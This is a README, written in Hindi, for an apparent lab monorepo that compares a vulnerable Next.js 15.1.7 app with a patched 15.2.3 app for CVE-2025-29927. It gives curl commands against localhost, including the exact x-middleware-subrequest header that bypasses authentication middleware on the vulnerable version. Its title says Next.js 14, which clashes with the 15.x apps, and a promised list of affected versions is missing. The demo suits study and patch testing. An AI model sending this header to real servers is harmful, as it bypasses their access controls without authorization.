
vulnerable-nextjs-14-CVE-2025-29927
यह रिपॉजिटरी एक मोनोरेपो प्रोजेक्ट है जो Next.js 15.2.3 और Next.js 15.1.7 संस्करणों का उपयोग करके CVE-2025-29927 मिडलवेयर भेद्यता की तुलना करता है।
CVE-2025-29927 Next.js के मिडलवेयर में पाई गई एक सुरक्षा भेद्यता है, जो x-middleware-subrequest हेडर का उपयोग करके प्रमाणीकरण मिडलवेयर को बायपास करने की अनुमति देती है। यह भेद्यता निम्नलिखित संस्करणों को प्रभावित करती है:
pnpm installpnpm dev$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}
$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}
nextjs-cve-2025-29927/
├── apps/
│ ├── next15_1_7/ # कमजोर संस्करण
│ └── next15_2_3/ # पैच किया गया संस्करण
├── packages/
│ └── ui/ # साझा UI घटक
└── README.md